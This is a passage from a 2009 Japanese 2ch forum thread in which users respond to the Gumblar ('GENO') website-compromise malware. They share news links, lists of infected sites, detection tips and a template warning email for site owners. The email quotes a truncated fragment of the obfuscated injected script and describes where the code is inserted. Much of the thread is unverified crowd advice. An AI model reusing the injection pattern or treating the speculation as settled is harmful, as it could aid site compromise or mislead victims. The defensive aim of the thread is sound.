767 :192.168.0.774:2009/05/18(月) 09:32:02 ID:bBtWfmBn0
>>764
同人板でやるよりも理解のある人にこっちに来て協力してもらった方がはるかに効率的だよ
あくまでも同人板ではヒントを出してくれるだけだと思ってさ
なんの手がかりもないよりかはジャンル名でも出てたら少しはマシでしょ
同人板でやるよりも理解のある人にこっちに来て協力してもらった方がはるかに効率的だよ
あくまでも同人板ではヒントを出してくれるだけだと思ってさ
なんの手がかりもないよりかはジャンル名でも出てたら少しはマシでしょ
768 :192.168.0.774:2009/05/18(月) 09:32:35 ID:GfBjvcuO0
769 :192.168.0.774:2009/05/18(月) 09:33:55 ID:3Wf1BgQ0O
同人板は便乗煽りやらなんやらでてきてるから話が全く進まないな
770 :192.168.0.774:2009/05/18(月) 09:34:17 ID:qhPHQv7V0
771 :192.168.0.774:2009/05/18(月) 09:35:45 ID:xKJ07MeN0
>>764
検体詐欺で凝り固まってるからもう何言っても無理だよ
検体詐欺で凝り固まってるからもう何言っても無理だよ
772 :192.168.0.774:2009/05/18(月) 09:40:08 ID:Zt9X7rvA0
773 :192.168.0.774:2009/05/18(月) 09:40:28 ID:RYc+mlfs0
>>770
載ってないから大丈夫と無防備のまま、他所で感染するところまでは想定内
載ってないから大丈夫と無防備のまま、他所で感染するところまでは想定内
774 :192.168.0.774:2009/05/18(月) 09:41:38 ID:yKeLT0rF0
すまん。リンク登録しようとしてるんだが
公式はともかく同人サイトも固有のサイト名?
ジャンル名?とかのがわかりやすそうな気がするんだけど
別に中身はどうでも良いから固有サイト名で良いのかな
公式はともかく同人サイトも固有のサイト名?
ジャンル名?とかのがわかりやすそうな気がするんだけど
別に中身はどうでも良いから固有サイト名で良いのかな
775 :192.168.0.774:2009/05/18(月) 09:41:46 ID:lNiEWqwt0
今回、GENOウイルスについては何故か2chとそこから作られたまとめサイト程度しか情報が無く、
報道された事例も、4月騒動の時にGENOでウイルスが配布されたってちょいかかれた程度しかない。
亜種はともかく、初期段階で艦船に使用された脆弱性が3月修正のものなのか5月修正のものなのかもはっきりしない。
ウイルスの強度としては、どうがんばっても検知しか出来ず、駆除は不可能、回復にはシステム再インストールしかなく、
それだって挙動が不明だからそれくらいしか安心できる手段が無いっていう、nimdaとかと同等、下手すりゃそれ以上の
かなりやばいレベルのウイルスなのに、2ch以外ではほとんど話題になっていない、報道は何やってんだ。
報道された事例も、4月騒動の時にGENOでウイルスが配布されたってちょいかかれた程度しかない。
亜種はともかく、初期段階で艦船に使用された脆弱性が3月修正のものなのか5月修正のものなのかもはっきりしない。
ウイルスの強度としては、どうがんばっても検知しか出来ず、駆除は不可能、回復にはシステム再インストールしかなく、
それだって挙動が不明だからそれくらいしか安心できる手段が無いっていう、nimdaとかと同等、下手すりゃそれ以上の
かなりやばいレベルのウイルスなのに、2ch以外ではほとんど話題になっていない、報道は何やってんだ。
776 :192.168.0.774:2009/05/18(月) 09:41:58 ID:ua7Ctj4Z0
>>752
最初に感染が確認されたGENOという通販サイトの告知が「ブラウザのキャッシュを消せ」であり
(後に、それすらもなかったことにされたが)全く効果がないものでした。それを揶揄する為に
貼られているAAですので、無視してください。
ブラウザのキャッシュを消すことに害はありませんが、感染前後の対処・予防には一切関係ありません。
最初に感染が確認されたGENOという通販サイトの告知が「ブラウザのキャッシュを消せ」であり
(後に、それすらもなかったことにされたが)全く効果がないものでした。それを揶揄する為に
貼られているAAですので、無視してください。
ブラウザのキャッシュを消すことに害はありませんが、感染前後の対処・予防には一切関係ありません。
777 :192.168.0.774:2009/05/18(月) 09:44:30 ID:7S654oYT0
キャッシュを消せってのは履歴を消させようとしたって事?
778 :192.168.0.774:2009/05/18(月) 09:45:11 ID:v6qQswXM0
>>774
私の意見だが、個人サイトならサイトタイトルそのままは避けた方が良いかも
企業サイトとか既に感染真っ黒で有名なところならまだしも
サイト名検索した人が、検索でうっかりリンク集に辿り着いちゃう可能性もあるし
私の意見だが、個人サイトならサイトタイトルそのままは避けた方が良いかも
企業サイトとか既に感染真っ黒で有名なところならまだしも
サイト名検索した人が、検索でうっかりリンク集に辿り着いちゃう可能性もあるし
すまん、焦って途中送信してしまった
これじゃ思い切り矛盾してるw
散々既出の有名どころなら検体鑑定してくれる人にも解るように書いた方が良いかなと最初は思ったんだが
一般のお客さんとかが企業名で検索して辿り着くケースもあるから、企業サイトも伏せ字とかにした方がいいかな
これじゃ思い切り矛盾してるw
散々既出の有名どころなら検体鑑定してくれる人にも解るように書いた方が良いかなと最初は思ったんだが
一般のお客さんとかが企業名で検索して辿り着くケースもあるから、企業サイトも伏せ字とかにした方がいいかな
780 :192.168.0.774:2009/05/18(月) 09:49:10 ID:q3s4agtr0
正直同人板は精神的に子供の集まりです。多少の基地外ぶりは勘弁してやって欲しい。
ケットコム という同人イベントの案内サイトがある
そこの[過去]で最近終了したイベントのジャンルを見る(特定ジャンル系ならなお良)
イベントサイトへのリンクを辿ればその中に参加サークルのリストがあったりする
イベントに参加したばかりのサイトは同人誌在庫情報や日記等を始め少なからず更新作業があったりする
感染サイト捜索法のひとつとして有効かもしれないです。
ケットコム という同人イベントの案内サイトがある
そこの[過去]で最近終了したイベントのジャンルを見る(特定ジャンル系ならなお良)
イベントサイトへのリンクを辿ればその中に参加サークルのリストがあったりする
イベントに参加したばかりのサイトは同人誌在庫情報や日記等を始め少なからず更新作業があったりする
感染サイト捜索法のひとつとして有効かもしれないです。
781 :192.168.0.774:2009/05/18(月) 09:49:17 ID:ZOxYxVRDO
前レスに出てたが検体を探すなら夢、夢絵、名前変換を掲げるところがいいと思う
確か夢マナー夢絵マナーのサイトが感染してたと聞いたのでより可能性が高い
また夢と通常二次を兼用しているところもあるから倍率ドン
確か夢マナー夢絵マナーのサイトが感染してたと聞いたのでより可能性が高い
また夢と通常二次を兼用しているところもあるから倍率ドン
782 :192.168.0.774:2009/05/18(月) 09:49:43 ID:yKeLT0rF0
>>772他同人板から来た人
来ました宣言とか挨拶みたいな雑談参加はいらんよ。
雑談は同人板のでもうお腹いっぱいです。
>>778
レスd。だが考えてみれば他に登録する人と重複しちゃなんだし
サイト名を一部だけ伏字で登録してみた。
来ました宣言とか挨拶みたいな雑談参加はいらんよ。
雑談は同人板のでもうお腹いっぱいです。
>>778
レスd。だが考えてみれば他に登録する人と重複しちゃなんだし
サイト名を一部だけ伏字で登録してみた。
783 :192.168.0.774:2009/05/18(月) 09:50:48 ID:GfBjvcuO0
784 :192.168.0.774:2009/05/18(月) 09:51:33 ID:4ySopLDi0
>>776 回答ありがとうです。つまりGENOが証拠隠滅?を謀ったからなのでしょうか。
キャッシュ消す事でGENOがウイルスに感染した事が証拠隠滅になるのかわかりませんが・・・
キャッシュ消す事でGENOがウイルスに感染した事が証拠隠滅になるのかわかりませんが・・・
785 :192.168.0.774:2009/05/18(月) 09:51:57 ID:c4TnzPSv0
>>764
ってかね、自分の目から見た分には
真面目に意見してた人は
ただ晒せ晒せなんて言ってないし、相当丁寧に説明してたと思うよ。
自分も参加しようと思ってたが、連投規制くらってるうちに
それがほとんど荒らしやら釣り認定されて
正直もういいやって気分になった。
今も頑張って説明してる人はいるけど
まだ「スルー検定」とか言われてるしね。
あれじゃ見限られても仕方ない。
ってかね、自分の目から見た分には
真面目に意見してた人は
ただ晒せ晒せなんて言ってないし、相当丁寧に説明してたと思うよ。
自分も参加しようと思ってたが、連投規制くらってるうちに
それがほとんど荒らしやら釣り認定されて
正直もういいやって気分になった。
今も頑張って説明してる人はいるけど
まだ「スルー検定」とか言われてるしね。
あれじゃ見限られても仕方ない。
786 :192.168.0.774:2009/05/18(月) 09:52:21 ID:tFgIi2z+0
自分が最初に登録しておいてアレだけど
「黒」って表現はいまいち宜しくない気がした
もっと良い表現は無いもんかな
「黒」って表現はいまいち宜しくない気がした
もっと良い表現は無いもんかな
787 :192.168.0.774:2009/05/18(月) 09:52:52 ID:0DpAySJK0
今北。ちょっと聞きたいんだが、cmd.exeの起動確認ってしても大丈夫なのか?
ダメって言うの見りゃ大丈夫っていうのもあってもう何が何だか
ダメって言うの見りゃ大丈夫っていうのもあってもう何が何だか
788 :192.168.0.774:2009/05/18(月) 09:53:02 ID:EUa+NIiOO
ジャンルヲチスレにスレ住人にはわかる形で具体的な感染サイトのヒントが出ていた
あいにくサイト名覚えてないし携帯だから確認できないが
あいにくサイト名覚えてないし携帯だから確認できないが
789 :192.168.0.774:2009/05/18(月) 09:54:45 ID:yKeLT0rF0
790 :192.168.0.774:2009/05/18(月) 09:59:39 ID:yKeLT0rF0
チェッカで1000%は確定で良いのかな?
アバスト反応しなかったから未確認の方が良い?
良く考えたらhostsでドメイン弾いていたはずなんだけど
もう一個の方でアバストが反応したのはなんでだ?
新しいドメインとったのだろうか? わかる人いたらちょっと頼む
アバスト反応しなかったから未確認の方が良い?
良く考えたらhostsでドメイン弾いていたはずなんだけど
もう一個の方でアバストが反応したのはなんでだ?
新しいドメインとったのだろうか? わかる人いたらちょっと頼む
791 :192.168.0.774:2009/05/18(月) 10:02:34 ID:TTbAOLbH0
試しにmixiの日記で告知してみたら普通の人は誰も知らないみたいで戦慄モノだった
企業とか狙われてるんだし、もう知ってる奴はできる限り一般に広めたほうがいいんじゃね
もし仮に単位確認時期の大学HPとか改ざんされたら大混乱なんてもんじゃねーぞ
まず普通の人間は「あっぷでいと?なにそれ新しいソフト?」って感じなんだから、いやマジで
企業とか狙われてるんだし、もう知ってる奴はできる限り一般に広めたほうがいいんじゃね
もし仮に単位確認時期の大学HPとか改ざんされたら大混乱なんてもんじゃねーぞ
まず普通の人間は「あっぷでいと?なにそれ新しいソフト?」って感じなんだから、いやマジで
792 :192.168.0.774:2009/05/18(月) 10:02:46 ID:duvNIOfD0
793 :192.168.0.774:2009/05/18(月) 10:02:48 ID:yKeLT0rF0
794 :192.168.0.774:2009/05/18(月) 10:03:40 ID:BKfPdn6O0
感染サイト開くとcookieに
miek
1
www.abcdefg.com/ランダムな文字列
*
みたいなの保存されてどこのサイトで感染したか判る
miek
1
www.abcdefg.com/ランダムな文字列
*
みたいなの保存されてどこのサイトで感染したか判る
795 :192.168.0.774:2009/05/18(月) 10:04:17 ID:xKiO8GiH0
住人のみんなおはやう
GENOウィルス対応済ませて疲れて夕方横になったら朝だったよー
一応対策してるスレと感染済み検体リスト貼っとくねん
http://pc11.2ch.net/test/read.cgi/internet/1242450264/
http://genolists.alink.uic.to/
検体協力出来る人居たらしてあげてちょ
同人板のスレは対処は出来ても検体協力頼んだら荒らし認定されちゃうから
対処に関してははこの2個見てちょ
http://www40.atwiki.jp/gegegeno/
http://www31.atwiki.jp/doujin_vinfo/
同人サイトから一般サイトへの広がりもやばくなってきたみたいだから一応貼っとく
新型インフルも大変だけど、ねらー的にはこっちも大変だよな
GENOウィルス対応済ませて疲れて夕方横になったら朝だったよー
一応対策してるスレと感染済み検体リスト貼っとくねん
http://pc11.2ch.net/test/read.cgi/internet/1242450264/
http://genolists.alink.uic.to/
検体協力出来る人居たらしてあげてちょ
同人板のスレは対処は出来ても検体協力頼んだら荒らし認定されちゃうから
対処に関してははこの2個見てちょ
http://www40.atwiki.jp/gegegeno/
http://www31.atwiki.jp/doujin_vinfo/
同人サイトから一般サイトへの広がりもやばくなってきたみたいだから一応貼っとく
新型インフルも大変だけど、ねらー的にはこっちも大変だよな
796 :192.168.0.774:2009/05/18(月) 10:04:18 ID:yKeLT0rF0
更に安価もミスってるし。しばらくサイト探しだけしてROMってるわ
797 :192.168.0.774:2009/05/18(月) 10:06:04 ID:xKiO8GiH0
>>795は誤爆
ごめんなさい(;つД`)
ごめんなさい(;つД`)
798 :192.168.0.774:2009/05/18(月) 10:07:49 ID:GfBjvcuO0
じわじわリストも上がってるな、協力感謝
799 :192.168.0.774:2009/05/18(月) 10:14:07 ID:Uvd5wKih0
800 :192.168.0.774:2009/05/18(月) 10:17:33 ID:ua7Ctj4Z0
>>775
>報道は何やってんだ。
多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
(2009/04/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857
多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
(2009/04/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856
薬事日報のサイトが改ざん〜閲覧者にウイルス感染のおそれ
(2009/04/22 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1864
正規サイト改ざん(3) ウイルスに感染しないための対策
(2009/04/24 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867
国内の正規サイト改ざん:攻撃サイトを変え再襲来
(2009/05/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
2009年5月14日 10:49:00 AM
人気の夜遊びウェブサイトへアクセスした人の週末が台無しに
http://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html
新手のWebベースマルウェアが急拡大
正規のWebサイトに感染する新手のマルウェアが勢力を急拡大している。
[ITmedia]2009年05月15日 08時24分 更新
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
SophosLabs ブログ (英語)
Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks.
http://www.sophos.com/blogs/sophoslabs/v/post/4405
>報道は何やってんだ。
多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
(2009/04/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857
多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
(2009/04/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856
薬事日報のサイトが改ざん〜閲覧者にウイルス感染のおそれ
(2009/04/22 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1864
正規サイト改ざん(3) ウイルスに感染しないための対策
(2009/04/24 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867
国内の正規サイト改ざん:攻撃サイトを変え再襲来
(2009/05/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
2009年5月14日 10:49:00 AM
人気の夜遊びウェブサイトへアクセスした人の週末が台無しに
http://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html
新手のWebベースマルウェアが急拡大
正規のWebサイトに感染する新手のマルウェアが勢力を急拡大している。
[ITmedia]2009年05月15日 08時24分 更新
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
SophosLabs ブログ (英語)
Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks.
http://www.sophos.com/blogs/sophoslabs/v/post/4405
801 :192.168.0.774:2009/05/18(月) 10:18:34 ID:ua7Ctj4Z0
小林製薬の一部サイトが改ざん、閲覧者はウイルス感染の恐れ
[INTERNET Watch]2009/05/14 14:57
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html
小林製薬のサイトが改ざん被害、閲覧でウイルス感染の可能性
[Yahoo!ニュース]5月15日17時11分配信
http://headlines.yahoo.co.jp/hl?a=20090515-00000002-vgb-secu
Symantec
脅威レポートのタブ(Volume XIII ハイライト)
http://www.symantec.com/ja/jp/business/theme.jsp?themeid=threatreport
(概要としては今回の攻撃型の予測になっているような気がするので、ちょっとずれてるけど記載)
てきとーに漁ってこんなもんかな。
[INTERNET Watch]2009/05/14 14:57
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html
小林製薬のサイトが改ざん被害、閲覧でウイルス感染の可能性
[Yahoo!ニュース]5月15日17時11分配信
http://headlines.yahoo.co.jp/hl?a=20090515-00000002-vgb-secu
Symantec
脅威レポートのタブ(Volume XIII ハイライト)
http://www.symantec.com/ja/jp/business/theme.jsp?themeid=threatreport
(概要としては今回の攻撃型の予測になっているような気がするので、ちょっとずれてるけど記載)
てきとーに漁ってこんなもんかな。
802 :192.168.0.774:2009/05/18(月) 10:20:34 ID:ihTs5Cw90
あれ?so-netってGENOにやられてるんじゃないっけ?気のせいだっけ
803 :192.168.0.774:2009/05/18(月) 10:20:40 ID:lNiEWqwt0
804 :192.168.0.774:2009/05/18(月) 10:24:09 ID:k2CI1leb0
>>794
そのcookieチェックがないスクリプトもあるよ。
つか、gnomeの中の人が報告してるphp埋め込みのタイプのを収集してる
ところなんだけど、なかなか新しいバリエーションが見つからない。
そのcookieチェックがないスクリプトもあるよ。
つか、gnomeの中の人が報告してるphp埋め込みのタイプのを収集してる
ところなんだけど、なかなか新しいバリエーションが見つからない。
805 :192.168.0.774:2009/05/18(月) 10:25:01 ID:gw0F+TVl0
Adobe Shockwave Playerってのも更新したほうがいいの?
ってかどうやってバージョン確認するんでしょうか?
xp pro sp2
ってかどうやってバージョン確認するんでしょうか?
xp pro sp2
806 :192.168.0.774:2009/05/18(月) 10:25:52 ID:cIdqirF80
命まで取られねえ
そのまま使え
そのまま使え
807 :192.168.0.774:2009/05/18(月) 10:26:22 ID:iven4hyc0
>>800
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
808 :192.168.0.774:2009/05/18(月) 10:28:28 ID:n6Y+m8FmO
感染確認方法にあるタスクマネージャでの方法だけど
小文字と大文字とか関係ある?
見本は小文字なんだけど見たらうちのは大文字でSVCHOST.EXEだった
さらにsvchst.exeっつーのがあるんだが…
ひょっとしてアウト?
小文字と大文字とか関係ある?
見本は小文字なんだけど見たらうちのは大文字でSVCHOST.EXEだった
さらにsvchst.exeっつーのがあるんだが…
ひょっとしてアウト?
809 :192.168.0.774:2009/05/18(月) 10:28:41 ID:k2CI1leb0
810 :192.168.0.774:2009/05/18(月) 10:31:33 ID:7k/9HGtp0 BE:660438427-2BP(0)
811 :192.168.0.774:2009/05/18(月) 10:31:52 ID:2hjuGSUk0
>>808
その二つのプロセス名でググってみろ
その二つのプロセス名でググってみろ
812 :192.168.0.774:2009/05/18(月) 10:35:45 ID:gw0F+TVl0
813 :192.168.0.774:2009/05/18(月) 10:37:26 ID:cIdqirF80
>>812
更新してよ・・
更新してよ・・
814 :スパムのような警告メール:2009/05/18(月) 10:38:36 ID:ua7Ctj4Z0
Webサイト製作 ご担当者さま
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。
感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)感染を広げるための
スクリプトの埋め込みを行なうようです。
他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。
HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と
なっております。
■ 確認した感染ページ
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
(例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず
危険コードが埋めこまれないようです)
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。
感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)感染を広げるための
スクリプトの埋め込みを行なうようです。
他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。
HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と
なっております。
■ 確認した感染ページ
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
(例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず
危険コードが埋めこまれないようです)
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
815 :スパムのような警告メール:2009/05/18(月) 10:39:31 ID:ua7Ctj4Z0
■感染していると思われるページの危険部分
(これは一例です。複数のバリエーションがありますので、同じ文字列とは限りません)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
HP更新に使用したPCが感染していると思われるマルウェア(コンピュータウイルス)は
新種の為、正式名称が定まっておらず、GENO(ZLKON)ウイルス/gumblar.cn/martuz.cn などと
呼ばれているものと思われます。下記のサイトの情報をご参照ください。
まとめサイト
http://www29.atwiki.jp/geno/
各社の告知
So-NET セキュリティ通信
多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857
多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856
正規サイト改ざん(3) ウイルスに感染しないための対策
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867
国内の正規サイト改ざん:攻撃サイトを変え再襲来
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
[ITmedia]新手のWebベースマルウェアが急拡大
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
専門的な解説等
http://ilion.blog.shinobi.jp/Entry/85/
http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
http://www3.atword.jp/gnome/
このマルウェアに感染したPCで、FTP接続しファイルを更新することでhtmlやphp、js
といったファイルが書き換えられて現在の状況になっているものと思われます。
(これは一例です。複数のバリエーションがありますので、同じ文字列とは限りません)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
HP更新に使用したPCが感染していると思われるマルウェア(コンピュータウイルス)は
新種の為、正式名称が定まっておらず、GENO(ZLKON)ウイルス/gumblar.cn/martuz.cn などと
呼ばれているものと思われます。下記のサイトの情報をご参照ください。
まとめサイト
http://www29.atwiki.jp/geno/
各社の告知
So-NET セキュリティ通信
多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857
多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856
正規サイト改ざん(3) ウイルスに感染しないための対策
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867
国内の正規サイト改ざん:攻撃サイトを変え再襲来
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
[ITmedia]新手のWebベースマルウェアが急拡大
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
専門的な解説等
http://ilion.blog.shinobi.jp/Entry/85/
http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
http://www3.atword.jp/gnome/
このマルウェアに感染したPCで、FTP接続しファイルを更新することでhtmlやphp、js
といったファイルが書き換えられて現在の状況になっているものと思われます。
816 :192.168.0.774:2009/05/18(月) 10:40:03 ID:k2CI1leb0
>>812
最新にしておいて害はない。
最新にしておいて害はない。
817 :スパムのような警告メール:2009/05/18(月) 10:40:44 ID:ua7Ctj4Z0
■ 解決方法について
駆除方法
http://www29.atwiki.jp/geno/pages/14.html
一度感染してしまうと、PC稼動状態で除去するのは困難…というより、無理です。
必要なデータをバックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にするしかありません。
1.Webサイトにある「ファイルを一旦全て削除し」被害の拡大を阻止
隠れた所に残存する可能性があるのですべてのファイルを削除してください
この段階では、告知を上げても、告知自体に危険コードが入りますので
まずは削除だけをお願いします。
2.各種データのバックアップ(IDとかパスワードのメモやブックマークも忘れず)
3.OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
4.HP更新に使用するftpパスワードの変更
(以前のものは盗まれており外部から悪用される可能性があります)
5.Webサイトに危険コードを含まないファイルをアップロードしなおす。
6.感染が行われる状態であった日時の告知とサイト訪問者に対するお詫び、及び
解決策の紹介(PCリカバリ/OS再インストールしかない訳ですが)。
正直かつ正確に書くことで訪問者からの信用回復を行なってください。
最初にこのウイルスが確認された、某通販サイトのように、危険な状態であったことを
隠蔽したり、ブラウザのキャッシュを消せばOKといった嘘情報を書くことで、被害を
拡大させるようなことだけは行なわないようにお願いいたします。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
感染PCはゾンビ化して、ボットネットに組込まれるという情報もありますが
正確なことはわかっていません。
■再発防止策
・WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデート
・既知の危険サイト(今回の場合は、http://www3.atword.jp/gnome/の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、
PG2といったソフトのIPブロックで感染を回避する。
焼却リスト:http://www3.atword.jp/gnome/2000/01/13/block-list/
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
駆除方法
http://www29.atwiki.jp/geno/pages/14.html
一度感染してしまうと、PC稼動状態で除去するのは困難…というより、無理です。
必要なデータをバックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にするしかありません。
1.Webサイトにある「ファイルを一旦全て削除し」被害の拡大を阻止
隠れた所に残存する可能性があるのですべてのファイルを削除してください
この段階では、告知を上げても、告知自体に危険コードが入りますので
まずは削除だけをお願いします。
2.各種データのバックアップ(IDとかパスワードのメモやブックマークも忘れず)
3.OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
4.HP更新に使用するftpパスワードの変更
(以前のものは盗まれており外部から悪用される可能性があります)
5.Webサイトに危険コードを含まないファイルをアップロードしなおす。
6.感染が行われる状態であった日時の告知とサイト訪問者に対するお詫び、及び
解決策の紹介(PCリカバリ/OS再インストールしかない訳ですが)。
正直かつ正確に書くことで訪問者からの信用回復を行なってください。
最初にこのウイルスが確認された、某通販サイトのように、危険な状態であったことを
隠蔽したり、ブラウザのキャッシュを消せばOKといった嘘情報を書くことで、被害を
拡大させるようなことだけは行なわないようにお願いいたします。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
感染PCはゾンビ化して、ボットネットに組込まれるという情報もありますが
正確なことはわかっていません。
■再発防止策
・WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデート
・既知の危険サイト(今回の場合は、http://www3.atword.jp/gnome/の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、
PG2といったソフトのIPブロックで感染を回避する。
焼却リスト:http://www3.atword.jp/gnome/2000/01/13/block-list/
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
818 :192.168.0.774:2009/05/18(月) 10:41:01 ID:gw0F+TVl0
819 :スパムのような警告メール:2009/05/18(月) 10:42:24 ID:ua7Ctj4Z0
■私見による蛇足
幾つかのサイトの告知ページ等では、セキュリティソフトベンダーを紹介しておりますが、
実際に稼動する本体は、ほとんど日替わりのように入れ替えられている為に、紹介されている
セキュリティソフトにて「除去が行なえるとは言い切れません」。(というか多分無理です)
